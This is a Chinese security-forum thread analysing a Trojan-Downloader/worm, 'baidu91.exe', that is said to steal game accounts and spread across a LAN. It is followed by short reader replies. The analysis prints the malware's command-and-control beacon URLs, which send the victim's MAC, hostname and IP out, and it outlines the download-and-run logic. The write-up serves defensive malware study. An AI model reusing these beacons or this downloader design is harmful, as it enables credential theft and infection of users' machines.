网吧拦截到的一个病毒文件的详细分析报告 9月15日 此文件360免杀
本帖最后由 战争贩子 于 2014-9-15 18:05 编辑baidu91.exe 病毒行为分析
分析人:52pojie 战争贩子病毒信息名称:baidu91.exe 会下载若干木马文件文件名不一大小:36 kb文件类型: PE 文件未加壳病毒类型:Trojan-Downloader Trojan.Worm360查杀:未发现木马文件CRC:0x5D9C690B概述 该文件执行后会通过网络获取加密策略,并且通过该策略对指定进程进行遍历,如果发现该进程(游戏),就从指定服务器下载该进程(游戏)的木马文件并且执行。最后发送该主机的相关信息到指定的服务器的页面接口上。 详细分析利用OD工具载入该程序,在send与recv处下断点,发现该程序有一下封包的交互行为
(图1)
图1为程序执行之后发送的第一个请求封包。此链接的地址为:http://t.01398.com:5876/c.txt?t=1410761014&mac=080027F168EE&flag=baidu91&name=LIQUAN-FE29EC1&ver=4&os=51&hash=18e98f6603f4970170b878ff6f1bc848
(图2)
图2为第一次接收的封包,可见接收到的封包为多行字符串,意义就是某种策略。
(图3)
图3:直接运行连接的结果
继续执行代码,走出recv,下断点在程序偏移 0x1D3D处,发现ebp-0x2C变量的所指向的内容为。如图
(图4)
程序紧接着进入偏移0xB30处函数中,发现函数的调用顺序为先执行了CreateToolHelp32,紧接着调用了Process32First然后进入循环形成遍历链,条件为Process32Next返回值是否为NULL,这是个经典的遍历进程的代码。走出此函数发现,如果进程不存在则调走,如果进程存在执行下载者。如图遍历函数内容。见(图5)
(图5)
详细介绍下如果存在该进程的处理方式,如果通过修改内存使这个函数的判断为真(既存在这个进程)执行不跳转的那段代码,返现系统开始进行下载而且不同的进程下载的木马是不同的。比如说:DNF.exe下载的是一个DNF图标的进程,我分析之后发现是盗号木马。而svchost.exe(此进程一般存在)发现下载的是个驱动。见如下图DNF的下载进程情况。
(图6-图9)
最后无论是什么进程,程序均会往一个六合网站上发用户的主机信息等等。http://s1.01398.com:5898/r.ashx?t=1410761143&mac=080027F168EE&flag=baidu91&ip=192.168.1.106&name=LIQUAN-FE29EC1&run=init&ver=4&os=51&state=0&hash=dc65c382fa1ae3a0ed487e1398061c3f此为链接地址。
图10:程序出现蠕虫病毒的现象,像全局域网的系统开始发起入侵。
(图10)(图11)
程序下载了近20多种木马,危害严重。
总结
程序为一款多功能下载者及蠕虫病毒,可以盗取游戏账号,偷取游戏装备,提升黑客在系统的权限,并且网局域网其他机器发动远程攻击(攻击模式未知,按笔者主机的情况应该是某种缓冲区溢出攻击)
感觉不错,希望是精品程序呀。 为什么我发布的正文看不到 这病毒令我想到旗帜僵尸,看似普通,实则能呼朋引伴找来大量同伙。 骑乌龟的帅蜗牛 发表于 2014-9-16 10:53
好强大长见识了
蜗牛又来水了? 附件样本压缩包上传时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报! Hmily 发表于 2014-9-15 17:57
附件样本压缩包上传时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报!
好的 我这就改 我去,好牛啊~ 好厉害,, 大神呀!我毕业设计要做一个木马,目前努力学习中!! 诶呀妈呀大神纳。 好强大长见识了